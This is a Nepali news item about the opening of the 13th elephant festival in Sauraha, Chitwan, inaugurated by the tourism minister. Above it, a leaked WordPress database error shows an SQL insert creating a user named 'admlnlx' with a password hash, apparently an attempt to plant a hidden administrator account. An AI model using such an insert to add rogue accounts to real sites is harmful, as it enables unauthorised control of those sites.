WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bt3ueOPGjGJBnM7/05LZIYLwNCQX78.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 17:00:07', '', 'admlnlx', 'admlnlx')
चितवन, पुस ११–
चितवनको सौराहामा आजदेखि १३ औं हात्ती महोत्सव सुरु भएको छ । महोत्सवको एक भव्य समारोहकाबीच पर्यटनमन्त्री जीवनबहादुर शाहीले समुद्घाटन गर्नुभयो । उहाँले दीपप्रज्वलन गरि महोत्सवको औपचारिक सुरुवात गर्नुभयो । महोत्सवको उद्घाटन समारोहमा अहिले मन्तव्य व्यक्त गर्ने क्रम जारी छ ।
महोत्सव उद्घाटन अघि बृहत झाँकीसहितको शोभा यात्रा निकालिएको छ । राप्ती किनारबाट सुरु भएको शोभा यात्रा महोत्सव स्थल बाघमारा चौरमा पुगि समापन गरिएको छ । र्यालीमा विभिन्न जातजातिको झाँकी प्रस्तुत गरिएको छ । विशेषगरि थारु समुदायको साँस्कृतिक समूह सबैको आकर्षण बनेको थियो । र्यालीमा सयौंको सहभागिता रहेको थियो ।
क्षेत्रीय होटल संघ सौराहाको आयोजनामा महोत्सव पुस १५ गतेसम्म चल्ने छ ।
महोत्सवमा हात्ती फाष्टवाक प्रतियोगिता, हात्तीपोलो प्रतियोगिता, हात्तीका छावाहरुबीच रोमाञ्चक फुटबल, हात्ती श्रृंगार प्रतियोगिता, गाडा दौड, हात्ती पेन्टिङ, हात्तीको वनभोज, साँस्कृतिक कार्यक्रम र डुंगा दौड प्रतियोगिता आयोजना गरिनेछ ।